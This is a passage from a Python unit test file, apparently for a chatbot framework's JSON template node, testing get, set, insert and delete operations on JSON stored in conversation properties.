node._name = TemplateWordNode("data_json")
node._type = "data"
node._item = TemplateWordNode("key")
node._key = TemplateWordNode("key_data")
root.append(node)
self._client_context.brain.properties.add_property("default-get", "unknown")
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('dic_1', result)
node._index = TemplateWordNode("1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('dic_2', result)
node._index = TemplateWordNode("2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('dic_3', result)
node._index = TemplateWordNode("3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_dict_element(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
self._client_context.brain.properties.add_property("default-get", "unknown")
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('val_1', result)
node._index = TemplateWordNode("1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('val_2', result)
node._index = TemplateWordNode("2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('val_3', result)
node._index = TemplateWordNode("3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_dict_element_from_end(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
self._client_context.brain.properties.add_property("default-get", "unknown")
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
node._index = TemplateWordNode("-1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('val_3', result)
node._index = TemplateWordNode("-2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('val_2', result)
node._index = TemplateWordNode("-3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('val_1', result)
node._index = TemplateWordNode("-4")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_invalid_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._index = TemplateWordNode("x")
node._key = TemplateWordNode("key_data")
root.append(node)
self._client_context.brain.properties.add_property("default-get", "unknown")
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
# SET
def test_json_set_typename(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("value_name"))
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": "value_name"}', conversation.property("name_json"))
def test_json_set_typedata(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("value_data"))
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_data": "value_data"}', conversation.data_property("data_json"))
def test_json_set_typevar(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("value_var"))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": "value_var"}', question.property("var_json"))
def test_json_set_with_quote(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode('"value_var"'))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": "value_var"}', question.property("var_json"))
def test_json_set_short_value(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("v"))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": "v"}', question.property("var_json"))
def test_json_set_empty(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
node.append(TemplateWordNode(""))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertIsNone(conversation.data_property("data_json"))
def test_json_set_empty_data(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
node.append(TemplateWordNode('""'))
root.append(node)
self.assertEqual(len(root.children), 1)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_data": ""}', conversation.data_property("data_json"))
def test_json_set_sub_dic(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json.key_data")
node._type = "data"
node._key = TemplateWordNode("child")
node.append(TemplateWordNode("value_data"))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_data": {"child": "value_data"}}', conversation.data_property("data_json"))
def test_json_set_value_to_dict(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json.key_data.child")
node._type = "data"
node._key = TemplateWordNode("key")
node.append(TemplateWordNode("value_data"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"child": "data"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_data": {"child": {"key": "value_data"}}}', conversation.data_property("data_json"))
def test_json_set_sub_child(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json.key_data")
node._type = "data"
node._key = TemplateWordNode("child2")
node.append(TemplateWordNode("value_data"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_data_property("data_json", '{"key_data": {"child1": "data"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_data": {"child1": "data", "child2": "value_data"}}', conversation.data_property("data_json"))
def test_json_set_add_dic(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json.key_data.child")
node._type = "data"
node._key = TemplateWordNode("add")
root.append(node)
node.append(TemplateWordNode("value_data"))
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"child": {"data": ""}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_data": {"child": {"add": "value_data"}}}', conversation.data_property("data_json"))
def test_json_set_with_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("data"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["data", "list_2", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["data", "data", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
node._index = TemplateWordNode("3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
def test_json_set_with_index_from_end(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("data"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("-1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "data"]}', conversation.property("name_json"))
node._index = TemplateWordNode("-2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "data", "data"]}', conversation.property("name_json"))
node._index = TemplateWordNode("-3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
node._index = TemplateWordNode("-4")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
def test_json_set_list(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode('"list_1", "list_2", "list_3"'))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
def test_json_set_list_emptydata(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode('"", "list_2", ""'))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertEqual('{"key_name": ["", "list_2", ""]}', conversation.property("name_json"))
def test_json_set_list_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node._index = TemplateWordNode("1")
node.append(TemplateWordNode('"data_1", "data_2", "data3"'))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", ["data_1", "data_2", "data3"], "list_3"]}', conversation.property("name_json"))
def test_json_set_jsonform(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode('{"key_1": "val_1", "key_2": "val_2"}'))
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": {"key_1": "val_1", "key_2": "val_2"}}', conversation.property("name_json"))
def test_json_set_jsonform_with_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node._index = TemplateWordNode("1")
node.append(TemplateWordNode('{"key_1": "val_1", "key_2": "val_2"}'))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": ["list_1", {"key_1": "val_1", "key_2": "val_2"}, "list_3"]}', conversation.property("name_json"))
def test_json_set_convert_null(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("null"))
node._is_convert = True
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": null}', conversation.property("name_json"))
def test_json_set_convert_true(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("true"))
node._is_convert = True
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": true}', conversation.property("name_json"))
def test_json_set_convert_false(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("false"))
node._is_convert = True
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": false}', conversation.property("name_json"))
def test_json_set_convert_integer(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("100"))
node._is_convert = True
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": 100}', conversation.property("name_json"))
def test_json_set_convert_float(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("0.11"))
node._is_convert = True
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": 0.11}', conversation.property("name_json"))
def test_json_set_convert_other(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("text"))
node._is_convert = True
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
self.assertEqual('{"key_name": "text"}', conversation.property("name_json"))
def test_json_set_invalid_listform(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
node.append(TemplateWordNode('val_1, val_2'))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_json_set_invalid_listform_short(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
node.append(TemplateWordNode("v, a"))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_json_set_invalid_jsonform(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
node.append(TemplateWordNode('{"key_1": "val_1, "key_2": "val_2"}'))
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_json_set_invalid_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
node.append(TemplateWordNode("value_var"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("x")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("-4")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
# INSERT
def test_json_insert_first(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("0")
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("value_var"))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["value_var", "list_1", "list_2"]}', question.property("var_json"))
def test_json_insert_middle(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("1")
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("var_val"))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["list_1", "var_val", "list_2"]}', question.property("var_json"))
def test_json_insert_middle_from_end(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("-2")
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("var_val"))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["list_1", "var_val", "list_2"]}', question.property("var_json"))
def test_json_insert_last(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("-1")
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
node.append(TemplateWordNode("value_var"))
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["list_1", "list_2", "value_var"]}', question.property("var_json"))
def test_json_insert_new_first(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("0")
node._key = TemplateWordNode("key_var")
node.append(TemplateWordNode("value_var"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["value_var"]}', question.property("var_json"))
def test_json_insert_new_last(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("-1")
node.append(TemplateWordNode("value_var"))
node._key = TemplateWordNode("key_var")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["value_var"]}', question.property("var_json"))
def test_json_insert_new_jsonform(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("-1")
node.append(TemplateWordNode('{"key_1": "data_1"}'))
node._key = TemplateWordNode("key_var")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": [{"key_1": "data_1"}]}', question.property("var_json"))
def test_json_insert_list(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("0")
node._key = TemplateWordNode("key_var")
node.append(TemplateWordNode('"data_1", "data_2"'))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": ["data_1", "data_2", "list_1", "list_2"]}', question.property("var_json"))
def test_json_insert_jsonform(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("0")
node._key = TemplateWordNode("key_var")
node.append(TemplateWordNode('{"key_1": "data_1", "key_2": "data_2"}'))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": [{"key_1": "data_1", "key_2": "data_2"}, "list_1", "list_2"]}', question.property("var_json"))
def test_json_insert_not_list(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("0")
node._key = TemplateWordNode("key_var")
node.append(TemplateWordNode('"data_1", "data_2"'))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": "value"}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertIsNotNone(conversation.current_question())
self.assertIsNotNone(conversation)
self.assertEqual('{"key_var": "value"}', question.property("var_json"))
def test_json_insert_not_index_top(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("1")
node._key = TemplateWordNode("key_name2")
node.append(TemplateWordNode('"data_1", "data_2"'))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": "value"}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": "value"}', conversation.property("name_json"))
def test_json_insert_invalid_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._key = TemplateWordNode("key_var")
node.append(TemplateWordNode("var_val"))
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
node._index = TemplateWordNode("x")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_var": ["list_1", "list_2"]}', question.property("var_json"))
node._index = TemplateWordNode("3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_var": ["list_1", "list_2"]}', question.property("var_json"))
node._index = TemplateWordNode("-4")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_var": ["list_1", "list_2"]}', question.property("var_json"))
# DELETE
def test_json_delete_typename(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_name")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_property("name_json", '{"key_name": "value_name"}')
self.assertEqual('{"key_name": "value_name"}', conversation.property("name_json"))
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual("{}", conversation.property("name_json"))
def test_json_delete_typedata(self):
root = TemplateNode()
self.assertIsNotNone(root)
